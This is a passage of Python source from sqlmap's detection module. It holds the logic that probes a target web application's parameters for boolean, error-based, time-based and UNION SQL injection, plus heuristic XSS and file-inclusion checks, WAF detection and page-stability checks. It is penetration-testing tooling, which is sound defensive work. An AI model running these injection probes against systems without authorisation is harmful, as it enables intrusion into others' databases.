logger.info(infoMsg)\n\n break\n\n if injectable:\n if kb.pageStable and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):\n if all((falseCode, trueCode)) and falseCode != trueCode:\n suggestion = conf.code = trueCode\n\n infoMsg = \"%sparameter '%s' appears to be '%s' injectable (with --code=%d)\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title, conf.code)\n logger.info(infoMsg)\n else:\n trueSet = set(extractTextTagContent(trueRawResponse))\n trueSet |= set(__ for _ in trueSet for __ in _.split())\n\n falseSet = set(extractTextTagContent(falseRawResponse))\n falseSet |= set(__ for _ in falseSet for __ in _.split())\n\n if threadData.lastErrorPage and threadData.lastErrorPage[1]:\n errorSet = set(extractTextTagContent(threadData.lastErrorPage[1]))\n errorSet |= set(__ for _ in errorSet for __ in _.split())\n else:\n errorSet = set()\n\n candidates = filterNone(_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet - errorSet))\n\n if candidates:\n candidates = sorted(candidates, key=len)\n for candidate in candidates:\n if re.match(r\"\\A\\w{2,}\\Z\", candidate): # Note: length of 1 (e.g. --string=5) could cause trouble, especially in error message pages with partially reflected payload content\n break\n\n suggestion = conf.string = candidate\n\n infoMsg = \"%sparameter '%s' appears to be '%s' injectable (with --string=\\\"%s\\\")\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title, repr(conf.string).lstrip('u').strip(\"'\"))\n logger.info(infoMsg)\n\n if not any((conf.string, conf.notString)):\n candidates = filterNone(_.strip() if _.strip() in falseRawResponse and _.strip() not in trueRawResponse else None for _ in (falseSet - trueSet))\n\n if candidates:\n candidates = sorted(candidates, key=len)\n for candidate in candidates:\n if re.match(r\"\\A\\w+\\Z\", candidate):\n break\n\n suggestion = conf.notString = candidate\n\n infoMsg = \"%sparameter '%s' appears to be '%s' injectable (with --not-string=\\\"%s\\\")\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title, repr(conf.notString).lstrip('u').strip(\"'\"))\n logger.info(infoMsg)\n\n if not suggestion:\n infoMsg = \"%sparameter '%s' appears to be '%s' injectable \" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title)\n singleTimeLogMessage(infoMsg)\n\n # In case of error-based SQL injection\n elif method == PAYLOAD.METHOD.GREP:\n # Perform the test's request and grep the response\n # body for the test's regular expression\n try:\n page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)\n output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE)\n output = output or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE)\n output = output or extractRegexResult(check, listToStrValue((headers[key] for key in headers if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE)\n output = output or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)\n\n if output:\n result = output == '1'\n\n if result:\n infoMsg = \"%sparameter '%s' is '%s' injectable \" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title)\n logger.info(infoMsg)\n\n injectable = True\n\n except SqlmapConnectionException as ex:\n debugMsg = \"problem occurred most likely because the \"\n debugMsg += \"server hasn't recovered as expected from the \"\n debugMsg += \"used error-based payload ('%s')\" % getSafeExString(ex)\n logger.debug(debugMsg)\n\n # In case of time-based blind or stacked queries\n # SQL injections\n elif method == PAYLOAD.METHOD.TIME:\n # Perform the test's request\n trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)\n trueCode = threadData.lastCode\n\n if trueResult:\n # Extra validation step (e.g. to check for DROP protection mechanisms)\n if SLEEP_TIME_MARKER in reqPayload:\n falseResult = Request.queryPage(reqPayload.replace(SLEEP_TIME_MARKER, \"0\"), place, timeBasedCompare=True, raise404=False)\n if falseResult:\n continue\n\n # Confirm test's results\n trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)\n\n if trueResult:\n infoMsg = \"%sparameter '%s' appears to be '%s' injectable \" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title)\n logger.info(infoMsg)\n\n injectable = True\n\n # In case of UNION query SQL injection\n elif method == PAYLOAD.METHOD.UNION:\n # Test for UNION injection and set the sample\n # payload as well as the vector.\n # NOTE: vector is set to a tuple with 6 elements,\n # used afterwards by Agent.forgeUnionQuery()\n # method to forge the UNION query payload\n\n configUnion(test.request.char, test.request.columns)\n\n if len(kb.dbmsFilter or []) == 1:\n Backend.forceDbms(kb.dbmsFilter[0])\n elif not Backend.getIdentifiedDbms():\n if kb.heuristicDbms is None:\n if kb.heuristicTest == HEURISTIC_TEST.POSITIVE or injection.data:\n warnMsg = \"using unescaped version of the test \"\n warnMsg += \"because of zero knowledge of the \"\n warnMsg += \"back-end DBMS. You can try to \"\n warnMsg += \"explicitly set it with option '--dbms'\"\n singleTimeWarnMessage(warnMsg)\n else:\n Backend.forceDbms(kb.heuristicDbms)\n\n if unionExtended:\n infoMsg = \"automatically extending ranges for UNION \"\n infoMsg += \"query injection technique tests as \"\n infoMsg += \"there is at least one other (potential) \"\n infoMsg += \"technique found\"\n singleTimeLogMessage(infoMsg)\n\n # Test for UNION query SQL injection\n reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)\n\n if isinstance(reqPayload, six.string_types):\n infoMsg = \"%sparameter '%s' is '%s' injectable\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title)\n logger.info(infoMsg)\n\n injectable = True\n\n # Overwrite 'where' because it can be set\n # by unionTest() directly\n where = vector[6]\n\n kb.previousMethod = method\n\n if conf.offline:\n injectable = False\n\n # If the injection test was successful feed the injection\n # object with the test's details\n if injectable is True:\n # Feed with the boundaries details only the first time a\n # test has been successful\n if injection.place is None or injection.parameter is None:\n if place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):\n injection.parameter = place\n else:\n injection.parameter = parameter\n\n injection.place = place\n injection.ptype = ptype\n injection.prefix = prefix\n injection.suffix = suffix\n injection.clause = clause\n\n # Feed with test details every time a test is successful\n if hasattr(test, \"details\"):\n for key, value in test.details.items():\n if key == \"dbms\":\n injection.dbms = value\n\n if not isinstance(value, list):\n Backend.setDbms(value)\n else:\n Backend.forceDbms(value[0], True)\n\n elif key == \"dbms_version\" and injection.dbms_version is None and not conf.testFilter:\n injection.dbms_version = Backend.setVersion(value)\n\n elif key == \"os\" and injection.os is None:\n injection.os = Backend.setOs(value)\n\n if vector is None and \"vector\" in test and test.vector is not None:\n vector = test.vector\n\n injection.data[stype] = AttribDict()\n injection.data[stype].title = title\n injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload)\n injection.data[stype].where = where\n injection.data[stype].vector = vector\n injection.data[stype].comment = comment\n injection.data[stype].templatePayload = templatePayload\n injection.data[stype].matchRatio = kb.matchRatio\n injection.data[stype].trueCode = trueCode\n injection.data[stype].falseCode = falseCode\n\n injection.conf.textOnly = conf.textOnly\n injection.conf.titles = conf.titles\n injection.conf.code = conf.code\n injection.conf.string = conf.string\n injection.conf.notString = conf.notString\n injection.conf.regexp = conf.regexp\n injection.conf.optimize = conf.optimize\n\n if conf.beep:\n beep()\n\n # There is no need to perform this test for other\n # tags\n break\n\n if injectable is True:\n kb.vulnHosts.add(conf.hostname)\n break\n\n # Reset forced back-end DBMS value\n Backend.flushForcedDbms()\n\n except KeyboardInterrupt:\n warnMsg = \"user aborted during detection phase\"\n logger.warning(warnMsg)\n\n if conf.multipleTargets:\n msg = \"how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]\"\n choice = readInput(msg, default='X', checkBatch=False).upper()\n else:\n msg = \"how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]\"\n choice = readInput(msg, default='S', checkBatch=False).upper()\n\n if choice == 'X':\n if conf.multipleTargets:\n raise SqlmapSkipTargetException\n elif choice == 'C':\n choice = None\n while not ((choice or \"\").isdigit() and 0 <= int(choice) <= 6):\n if choice:\n logger.warning(\"invalid value\")\n msg = \"enter new verbosity level: [0-6] \"\n choice = readInput(msg, default=str(conf.verbose), checkBatch=False)\n conf.verbose = int(choice)\n setVerbosity()\n if hasattr(test.request, \"columns\") and hasattr(test.request, \"_columns\"):\n test.request.columns = test.request._columns\n delattr(test.request, \"_columns\")\n tests.insert(0, test)\n elif choice == 'N':\n return None\n elif choice == 'E':\n kb.endDetection = True\n elif choice == 'Q':\n raise SqlmapUserQuitException\n\n finally:\n # Reset forced back-end DBMS value\n Backend.flushForcedDbms()\n\n Backend.flushForcedDbms(True)\n\n # Return the injection object\n if injection.place is not None and injection.parameter is not None:\n if not conf.dropSetCookie and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data and injection.data[PAYLOAD.TECHNIQUE.BOOLEAN].vector.startswith('OR'):\n warnMsg = \"in OR boolean-based injection cases, please consider usage \"\n warnMsg += \"of switch '--drop-set-cookie' if you experience any \"\n warnMsg += \"problems during data retrieval\"\n logger.warning(warnMsg)\n\n if not checkFalsePositives(injection):\n if conf.hostname in kb.vulnHosts:\n kb.vulnHosts.remove(conf.hostname)\n if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:\n injection.notes.append(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE)\n else:\n injection = None\n\n if injection and NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:\n checkSuhosinPatch(injection)\n checkFilteredChars(injection)\n\n return injection\n\n@stackedmethod\ndef heuristicCheckDbms(injection):\n \"\"\"\n This functions is called when boolean-based blind is identified with a\n generic payload and the DBMS has not yet been fingerprinted to attempt\n to identify with a simple DBMS specific boolean-based test what the DBMS\n may be\n \"\"\"\n\n retVal = False\n\n if conf.skipHeuristics:\n return retVal\n\n pushValue(kb.injection)\n kb.injection = injection\n\n for dbms in getPublicTypeMembers(DBMS, True):\n randStr1, randStr2 = randomStr(), randomStr()\n\n Backend.forceDbms(dbms)\n\n if dbms in HEURISTIC_NULL_EVAL:\n result = checkBooleanExpression(\"(SELECT %s%s) IS NULL\" % (HEURISTIC_NULL_EVAL[dbms], FROM_DUMMY_TABLE.get(dbms, \"\")))\n elif not ((randStr1 in unescaper.escape(\"'%s'\" % randStr1)) and list(FROM_DUMMY_TABLE.values()).count(FROM_DUMMY_TABLE.get(dbms, \"\")) != 1):\n result = checkBooleanExpression(\"(SELECT '%s'%s)=%s%s%s\" % (randStr1, FROM_DUMMY_TABLE.get(dbms, \"\"), SINGLE_QUOTE_MARKER, randStr1, SINGLE_QUOTE_MARKER))\n else:\n result = False\n\n if result:\n if not checkBooleanExpression(\"(SELECT '%s'%s)=%s%s%s\" % (randStr1, FROM_DUMMY_TABLE.get(dbms, \"\"), SINGLE_QUOTE_MARKER, randStr2, SINGLE_QUOTE_MARKER)):\n retVal = dbms\n break\n\n Backend.flushForcedDbms()\n kb.injection = popValue()\n\n if retVal:\n infoMsg = \"heuristic (extended) test shows that the back-end DBMS \" # Not as important as \"parsing\" counter-part (because of false-positives)\n infoMsg += \"could be '%s' \" % retVal\n logger.info(infoMsg)\n\n kb.heuristicExtendedDbms = retVal\n\n return retVal\n\n@stackedmethod\ndef checkFalsePositives(injection):\n \"\"\"\n Checks for false positives (only in single special cases)\n \"\"\"\n\n retVal = True\n\n if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and \"Generic\" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):\n pushValue(kb.injection)\n\n infoMsg = \"checking if the injection point on %s \" % injection.place\n infoMsg += \"parameter '%s' is a false positive\" % injection.parameter\n logger.info(infoMsg)\n\n def _():\n return int(randomInt(2)) + 1\n\n kb.injection = injection\n\n for level in xrange(conf.level):\n while True:\n randInt1, randInt2, randInt3 = (_() for j in xrange(3))\n\n randInt1 = min(randInt1, randInt2, randInt3)\n randInt3 = max(randInt1, randInt2, randInt3)\n\n if conf.string and any(conf.string in getUnicode(_) for _ in (randInt1, randInt2, randInt3)):\n continue\n\n if conf.notString and any(conf.notString in getUnicode(_) for _ in (randInt1, randInt2, randInt3)):\n continue\n\n if randInt3 > randInt2 > randInt1:\n break\n\n if not checkBooleanExpression(\"%d%s%d\" % (randInt1, INFERENCE_EQUALS_CHAR, randInt1)):\n retVal = False\n break\n\n if PAYLOAD.TECHNIQUE.BOOLEAN not in injection.data:\n checkBooleanExpression(\"%d%s%d\" % (randInt1, INFERENCE_EQUALS_CHAR, randInt2)) # just in case if DBMS hasn't properly recovered from previous delayed request\n\n if checkBooleanExpression(\"%d%s%d\" % (randInt1, INFERENCE_EQUALS_CHAR, randInt3)): # this must not be evaluated to True\n retVal = False\n break\n\n elif checkBooleanExpression(\"%d%s%d\" % (randInt3, INFERENCE_EQUALS_CHAR, randInt2)): # this must not be evaluated to True\n retVal = False\n break\n\n elif not checkBooleanExpression(\"%d%s%d\" % (randInt2, INFERENCE_EQUALS_CHAR, randInt2)): # this must be evaluated to True\n retVal = False\n break\n\n elif checkBooleanExpression(\"%d %d\" % (randInt3, randInt2)): # this must not be evaluated to True (invalid statement)\n retVal = False\n break\n\n if not retVal:\n warnMsg = \"false positive or unexploitable injection point detected\"\n logger.warning(warnMsg)\n\n kb.injection = popValue()\n\n return retVal\n\n@stackedmethod\ndef checkSuhosinPatch(injection):\n \"\"\"\n Checks for existence of Suhosin-patch (and alike) protection mechanism(s)\n \"\"\"\n\n if injection.place in (PLACE.GET, PLACE.URI):\n debugMsg = \"checking for parameter length \"\n debugMsg += \"constraining mechanisms\"\n logger.debug(debugMsg)\n\n pushValue(kb.injection)\n\n kb.injection = injection\n randInt = randomInt()\n\n if not checkBooleanExpression(\"%d=%s%d\" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):\n warnMsg = \"parameter length constraining \"\n warnMsg += \"mechanism detected (e.g. Suhosin patch). \"\n warnMsg += \"Potential problems in enumeration phase can be expected\"\n logger.warning(warnMsg)\n\n kb.injection = popValue()\n\n@stackedmethod\ndef checkFilteredChars(injection):\n debugMsg = \"checking for filtered characters\"\n logger.debug(debugMsg)\n\n pushValue(kb.injection)\n\n kb.injection = injection\n randInt = randomInt()\n\n # all other techniques are already using parentheses in tests\n if len(injection.data) == 1 and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:\n if not checkBooleanExpression(\"(%d)=%d\" % (randInt, randInt)):\n warnMsg = \"it appears that some non-alphanumeric characters (i.e. ()) are \"\n warnMsg += \"filtered by the back-end server. There is a strong \"\n warnMsg += \"possibility that sqlmap won't be able to properly \"\n warnMsg += \"exploit this vulnerability\"\n logger.warning(warnMsg)\n\n # inference techniques depend on character '>'\n if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):\n if not checkBooleanExpression(\"%d>%d\" % (randInt + 1, randInt)):\n warnMsg = \"it appears that the character '>' is \"\n warnMsg += \"filtered by the back-end server. You are strongly \"\n warnMsg += \"advised to rerun with the '--tamper=between'\"\n logger.warning(warnMsg)\n\n kb.injection = popValue()\n\ndef heuristicCheckSqlInjection(place, parameter):\n if conf.skipHeuristics:\n return None\n\n origValue = conf.paramDict[place][parameter]\n paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place\n\n prefix = \"\"\n suffix = \"\"\n randStr = \"\"\n\n if conf.prefix or conf.suffix:\n if conf.prefix:\n prefix = conf.prefix\n\n if conf.suffix:\n suffix = conf.suffix\n\n while randStr.count('\\'') != 1 or randStr.count('\\\"') != 1:\n randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)\n\n kb.heuristicMode = True\n\n payload = \"%s%s%s\" % (prefix, randStr, suffix)\n payload = agent.payload(place, parameter, newValue=payload)\n page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)\n\n kb.heuristicPage = page\n kb.heuristicMode = False\n\n parseFilePaths(page)\n result = wasLastResponseDBMSError()\n\n infoMsg = \"heuristic (basic) test shows that %sparameter '%s' might \" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n\n def _(page):\n return any(_ in (page or \"\") for _ in FORMAT_EXCEPTION_STRINGS)\n\n casting = _(page) and not _(kb.originalPage)\n\n if not casting and not result and kb.dynamicParameter and origValue.isdigit() and not kb.heavilyDynamic:\n randInt = int(randomInt())\n payload = \"%s%s%s\" % (prefix, \"%d-%d\" % (int(origValue) + randInt, randInt), suffix)\n payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)\n result = Request.queryPage(payload, place, raise404=False)\n\n if not result:\n randStr = randomStr()\n payload = \"%s%s%s\" % (prefix, \"%s.%d%s\" % (origValue, random.randint(1, 9), randStr), suffix)\n payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)\n casting = Request.queryPage(payload, place, raise404=False)\n\n kb.heuristicTest = HEURISTIC_TEST.CASTED if casting else HEURISTIC_TEST.NEGATIVE if not result else HEURISTIC_TEST.POSITIVE\n\n if kb.heavilyDynamic:\n debugMsg = \"heuristic check stopped because of heavy dynamicity\"\n logger.debug(debugMsg)\n return kb.heuristicTest\n\n if casting:\n errMsg = \"possible %s casting detected (e.g. '\" % (\"integer\" if origValue.isdigit() else \"type\")\n\n platform = conf.url.split('.')[-1].lower()\n if platform == WEB_PLATFORM.ASP:\n errMsg += \"%s=CInt(request.querystring(\\\"%s\\\"))\" % (parameter, parameter)\n elif platform == WEB_PLATFORM.ASPX:\n errMsg += \"int.TryParse(Request.QueryString[\\\"%s\\\"], out %s)\" % (parameter, parameter)\n elif platform == WEB_PLATFORM.JSP:\n errMsg += \"%s=Integer.parseInt(request.getParameter(\\\"%s\\\"))\" % (parameter, parameter)\n else:\n errMsg += \"$%s=intval($_REQUEST[\\\"%s\\\"])\" % (parameter, parameter)\n\n errMsg += \"') at the back-end web application\"\n logger.error(errMsg)\n\n if kb.ignoreCasted is None:\n message = \"do you want to skip those kind of cases (and save scanning time)? %s \" % (\"[Y/n]\" if conf.multipleTargets else \"[y/N]\")\n kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N', boolean=True)\n\n elif result:\n infoMsg += \"be injectable\"\n if Backend.getErrorParsedDBMSes():\n infoMsg += \" (possible DBMS: '%s')\" % Format.getErrorParsedDBMSes()\n logger.info(infoMsg)\n\n else:\n infoMsg += \"not be injectable\"\n logger.warning(infoMsg)\n\n kb.heuristicMode = True\n kb.disableHtmlDecoding = True\n\n randStr1, randStr2 = randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH), randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH)\n value = \"%s%s%s\" % (randStr1, DUMMY_NON_SQLI_CHECK_APPENDIX, randStr2)\n payload = \"%s%s%s\" % (prefix, \"'%s\" % value, suffix)\n payload = agent.payload(place, parameter, newValue=payload)\n page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)\n\n paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place\n\n # Reference: https://bugs.python.org/issue18183\n if value.upper() in (page or \"\").upper():\n infoMsg = \"heuristic (XSS) test shows that %sparameter '%s' might be vulnerable to cross-site scripting (XSS) attacks\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n logger.info(infoMsg)\n\n if conf.beep:\n beep()\n\n for match in re.finditer(FI_ERROR_REGEX, page or \"\"):\n if randStr1.lower() in match.group(0).lower():\n infoMsg = \"heuristic (FI) test shows that %sparameter '%s' might be vulnerable to file inclusion (FI) attacks\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n logger.info(infoMsg)\n\n if conf.beep:\n beep()\n\n break\n\n kb.disableHtmlDecoding = False\n kb.heuristicMode = False\n\n return kb.heuristicTest\n\ndef checkDynParam(place, parameter, value):\n \"\"\"\n This function checks if the URL parameter is dynamic. If it is\n dynamic, the content of the page differs, otherwise the\n dynamicity might depend on another parameter.\n \"\"\"\n\n if kb.choices.redirect:\n return None\n\n kb.matchRatio = None\n dynResult = None\n randInt = randomInt()\n\n paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place\n\n infoMsg = \"testing if %sparameter '%s' is dynamic\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter)\n logger.info(infoMsg)\n\n try:\n payload = agent.payload(place, parameter, value, getUnicode(randInt))\n dynResult = Request.queryPage(payload, place, raise404=False)\n except SqlmapConnectionException:\n pass\n\n result = None if dynResult is None else not dynResult\n kb.dynamicParameter = result\n\n return result\n\ndef checkDynamicContent(firstPage, secondPage):\n \"\"\"\n This function checks for the dynamic content in the provided pages\n \"\"\"\n\n if kb.nullConnection:\n debugMsg = \"dynamic content checking skipped \"\n debugMsg += \"because NULL connection used\"\n logger.debug(debugMsg)\n return\n\n if any(page is None for page in (firstPage, secondPage)):\n warnMsg = \"can't check dynamic content \"\n warnMsg += \"because of lack of page content\"\n logger.critical(warnMsg)\n return\n\n if firstPage and secondPage and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (firstPage, secondPage)):\n ratio = None\n else:\n try:\n seqMatcher = getCurrentThreadData().seqMatcher\n seqMatcher.set_seq1(firstPage)\n seqMatcher.set_seq2(secondPage)\n ratio = seqMatcher.quick_ratio()\n except MemoryError:\n ratio = None\n\n if ratio is None:\n kb.skipSeqMatcher = True\n\n # In case of an intolerable difference turn on dynamicity removal engine\n elif ratio <= UPPER_RATIO_BOUND:\n findDynamicContent(firstPage, secondPage)\n\n count = 0\n while not Request.queryPage():\n count += 1\n\n if count > conf.retries:\n warnMsg = \"target URL content appears to be too dynamic. \"\n warnMsg += \"Switching to '--text-only' \"\n logger.warning(warnMsg)\n\n conf.textOnly = True\n return\n\n warnMsg = \"target URL content appears to be heavily dynamic. \"\n warnMsg += \"sqlmap is going to retry the request(s)\"\n singleTimeLogMessage(warnMsg, logging.CRITICAL)\n\n kb.heavilyDynamic = True\n\n secondPage, _, _ = Request.queryPage(content=True)\n findDynamicContent(firstPage, secondPage)\n\ndef checkStability():\n \"\"\"\n This function checks if the URL content is stable requesting the\n same page two times with a small delay within each request to\n assume that it is stable.\n\n In case the content of the page differs when requesting\n the same page, the dynamicity might depend on other parameters,\n like for instance string matching (--string).\n \"\"\"\n\n infoMsg = \"testing if the target URL content is stable\"\n logger.info(infoMsg)\n\n firstPage = kb.originalPage # set inside checkConnection()\n\n delay = MAX_STABILITY_DELAY - (time.time() - (kb.originalPageTime or 0))\n delay = max(0, min(MAX_STABILITY_DELAY, delay))\n time.sleep(delay)\n\n secondPage, _, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)\n\n if kb.choices.redirect:\n return None\n\n kb.pageStable = (firstPage == secondPage)\n\n if kb.pageStable:\n if firstPage:\n infoMsg = \"target URL content is stable\"\n logger.info(infoMsg)\n else:\n errMsg = \"there was an error checking the stability of page \"\n errMsg += \"because of lack of content. Please check the \"\n errMsg += \"page request results (and probable errors) by \"\n errMsg += \"using higher verbosity levels\"\n logger.error(errMsg)\n\n else:\n warnMsg = \"target URL content is not stable (i.e. content differs). sqlmap will base the page \"\n warnMsg += \"comparison on a sequence matcher. If no dynamic nor \"\n warnMsg += \"injectable parameters are detected, or in case of \"\n warnMsg += \"junk results, refer to user's manual paragraph \"\n warnMsg += \"'Page comparison'\"\n logger.warning(warnMsg)\n\n message = \"how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] \"\n choice = readInput(message, default='C').upper()\n\n if choice == 'Q':\n raise SqlmapUserQuitException\n\n elif choice == 'S':\n showStaticWords(firstPage, secondPage)\n\n message = \"please enter value for parameter 'string': \"\n string = readInput(message)\n\n if string:\n conf.string = string\n\n if kb.nullConnection:\n debugMsg = \"turning off NULL connection \"\n debugMsg += \"support because of string checking\"\n logger.debug(debugMsg)\n\n kb.nullConnection = None\n else:\n errMsg = \"Empty value supplied\"\n raise SqlmapNoneDataException(errMsg)\n\n elif choice == 'R':\n message = \"please enter value for parameter 'regex': \"\n regex = readInput(message)\n\n if regex:\n conf.regex = regex\n\n if kb.nullConnection:\n debugMsg = \"turning off NULL connection \"\n debugMsg += \"support because of regex checking\"\n logger.debug(debugMsg)\n\n kb.nullConnection = None\n else:\n errMsg = \"Empty value supplied\"\n raise SqlmapNoneDataException(errMsg)\n\n else:\n checkDynamicContent(firstPage, secondPage)\n\n return kb.pageStable\n\n@stackedmethod\ndef checkWaf():\n \"\"\"\n Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse\n \"\"\"\n\n if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline, conf.skipWaf)):\n return None\n\n if kb.originalCode == _http_client.NOT_FOUND:\n return None\n\n _ = hashDBRetrieve(HASHDB_KEYS.CHECK_WAF_RESULT, True)\n if _ is not None:\n if _:\n warnMsg = \"previous heuristics detected that the target \"\n warnMsg += \"is protected by some kind of WAF/IPS\"\n logger.critical(warnMsg)\n return _\n\n if not kb.originalPage:\n return None\n\n infoMsg = \"checking if the target is protected by \"\n infoMsg += \"some kind of WAF/IPS\"\n logger.info(infoMsg)\n\n retVal = False\n payload = \"%d %s\" % (randomInt(), IPS_WAF_CHECK_PAYLOAD)\n\n place = PLACE.GET\n if PLACE.URI in conf.parameters:\n value = \"%s=%s\" % (randomStr(), agent.addPayloadDelimiters(payload))\n else:\n value = \"\" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER\n value += \"%s=%s\" % (randomStr(), agent.addPayloadDelimiters(payload))\n\n pushValue(kb.choices.redirect)\n pushValue(kb.resendPostOnRedirect)\n pushValue(conf.timeout)\n\n kb.choices.redirect = REDIRECTION.YES\n kb.resendPostOnRedirect = False\n conf.timeout = IPS_WAF_CHECK_TIMEOUT\n\n try:\n retVal = (Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True, raise404=False, disableTampering=True)[1] or 0) < IPS_WAF_CHECK_RATIO\n except SqlmapConnectionException:\n retVal = True\n finally:\n kb.matchRatio = None\n\n conf.timeout = popValue()\n kb.resendPostOnRedirect = popValue()\n kb.choices.redirect = popValue()\n\n hashDBWrite(HASHDB_KEYS.CHECK_WAF_RESULT, retVal, True)\n\n if retVal:\n if not kb.identifiedWafs:\n warnMsg = \"heuristics detected that the target \"\n warnMsg += \"is protected by some kind of WAF/IPS\"\n logger.critical(warnMsg)\n\n message = \"are you sure that you want to \"\n message += \"continue with further target testing? [Y/n] \"\n choice = readInput(message, default='Y', boolean=True)\n\n if not choice:\n raise SqlmapUserQuitException\n else:\n if not conf.tamper:\n warnMsg = \"please consider usage of tamper scripts (option '--tamper')\"\n singleTimeWarnMessage(warnMsg)\n\n return retVal\n\n@stackedmethod\ndef checkNullConnection():\n \"\"\"\n Reference: http://www.wisec.it/sectou.php?id=472f952d79293\n \"\"\"\n\n if conf.data:\n return False\n\n _ = hashDBRetrieve(HASHDB_KEYS.CHECK_NULL_CONNECTION_RESULT, True)\n if _ is not None:\n kb.nullConnection = _\n\n if _:\n dbgMsg = \"resuming NULL connection method '%s'\" % _\n logger.debug(dbgMsg)\n\n else:\n infoMsg = \"testing NULL connection to the target URL\"\n logger.info(infoMsg)\n\n pushValue(kb.pageCompress)\n kb.pageCompress = False\n\n try:\n page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD, raise404=False)\n\n if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):\n kb.nullConnection = NULLCONNECTION.HEAD\n\n infoMsg = \"NULL connection is supported with HEAD method ('Content-Length')\"\n logger.info(infoMsg)\n else:\n page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: \"bytes=-1\"})\n\n if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}):\n kb.nullConnection = NULLCONNECTION.RANGE\n\n infoMsg = \"NULL connection is supported with GET method ('Range')\"\n logger.info(infoMsg)\n else:\n _, headers, _ = Request.getPage(skipRead=True)\n\n if HTTP_HEADER.CONTENT_LENGTH in (headers or {}):\n kb.nullConnection = NULLCONNECTION.SKIP_READ\n\n infoMsg = \"NULL connection is supported with 'skip-read' method\"\n logger.info(infoMsg)\n\n except SqlmapConnectionException:\n pass\n\n finally:\n kb.pageCompress = popValue()\n kb.nullConnection = False if kb.nullConnection is None else kb.nullConnection\n hashDBWrite(HASHDB_KEYS.CHECK_NULL_CONNECTION_RESULT, kb.nullConnection, True)\n\n return kb.nullConnection in getPublicTypeMembers(NULLCONNECTION, True)\n\ndef checkConnection(suppressOutput=False):\n threadData = getCurrentThreadData()\n\n if not re.search(r\"\\A\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\Z\", conf.hostname):\n if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):\n try:\n debugMsg = \"resolving hostname '%s'\" % conf.hostname\n logger.debug(debugMsg)\n socket.getaddrinfo(conf.hostname, None)\n except socket.gaierror:\n errMsg = \"host '%s' does not exist\" % conf.hostname\n raise SqlmapConnectionException(errMsg)\n except socket.error as ex:\n errMsg = \"problem occurred while \"\n errMsg += \"resolving a host name '%s' ('%s')\" % (conf.hostname, getSafeExString(ex))\n raise SqlmapConnectionException(errMsg)\n except UnicodeError as ex:\n errMsg = \"problem occurred while \"\n errMsg += \"handling a host name '%s' ('%s')\" % (conf.hostname, getSafeExString(ex))\n 